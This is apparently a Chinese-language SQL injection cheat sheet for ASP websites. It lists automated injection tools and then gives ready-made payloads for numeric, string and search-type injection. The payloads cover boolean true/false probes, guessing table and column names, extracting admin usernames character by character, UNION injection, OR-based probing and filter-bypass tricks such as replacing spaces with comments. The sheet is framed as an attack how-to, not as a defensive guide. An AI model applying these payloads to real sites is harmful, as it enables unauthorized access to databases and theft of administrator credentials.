参考链接:http://hi.baidu.com/xfazyiyllvfrwxe/item/09895e338bf0ecfe96f88df5
A. 工具注入
常用工具:啊D注入工具
明小子Domain3.5
B. 手工注入
1. 数值型
关键代码:
“select * from [xxxx] where id=” & request(“id”)
提交:127.0.0.1/xxx.asp?id=xx and 1=1 内容与正常显示基本相同
127.0.0.1/xxx.asp?id=xx and 1=2 提示BOF或EOF、或提示找不到记录、或显示内容为空、或显示类型不匹配
构造成—— select * from [xxxx] where id=xx and 1=1
select * from [xxxx] where id=xx and 1=2
猜表名
127.0.0.1/xxx.asp?id=xx and (select count(*) from 表名)>=0
猜列名(设表名为admin)
127.0.0.1/xxx.asp?id=xx and (select count(列名) from admin)>=0
猜内容(设列名为username)
127.0.0.1/xxx.asp?id=xx exists(select username from admin where asc(mid(username,位数,1))<N)
用到转换工具
2. 字符型
关键代码:
“select * from [User] where Username=’” & Username & “’”
提交:127.0.0.1/xxx.asp?name=xx’ and ‘1’=’1
127.0.0.1/xxx.asp?name=xx’ and ‘1’=’2
构造成—— select * from [User] where Username=’ xx’ and ‘1’=’1’
select * from [User] where Username=’ xx’ and ‘1’=’2’
猜表名
127.0.0.1/xxx.asp?name=xx’ and select count(*) from 表名 and ‘1’=’1
3. 搜索型
关键代码:
“select * from news where title Like ‘%”&key&”%’ order by id desc”
“select * from news where content Like ‘%”&key&”%’ order by id desc”
提交:127.0.0.1/News_search.asp?otype=msg&Submit=搜索&key=1%’ and 1=1 ‘%’=’
127.0.0.1/News_search.asp?otype=msg&Submit=搜索&key=1%’ and 1=2 ‘%’=’
构造成—— select * from news where title Like ‘%1%’ and 1=1 ‘%’=’ %’ order by id desc
select * from news where title Like ‘%1%’ and 1=2 ‘%’=’ %’ order by id desc
注:也可以在搜索处输入“1%’ and 1=1 ‘%’=’”
4. Union联合注入
提交:127.0.0.1/xxx.asp?id=xx order by n
127.0.0.1/xxx.asp?id=xx union select 1,2,3,4,5,6,7,..n from admin(可以在id=xx后增加and 1=2提高成功率),然后替换表名列名
5. OR用法
提交:127.0.0.1/xxx.asp?id=xx or 1=1 显示更多内容
127.0.0.1/xxx.asp?id=xx or 1=2 内容与正常显示基本相同
猜表名
127.0.0.1/xxx.asp?id=xx or (select count(*) from 表名)>=0 内容与or 1=1显示基本相同则存在此表名
6. 杂类
1) 关于空格:%20代表空格,可以用/**/或+代替
2) 联合注入时提交127.0.0.1/xxx.asp?id=-xx union select 1,2,3,4,5,6,7,..n from admin
即在id=后面加个减号,也是同样的效果
3) 绕过过滤:插入%,插入过滤掉的and,改变大小写等,通过读源码灵活构造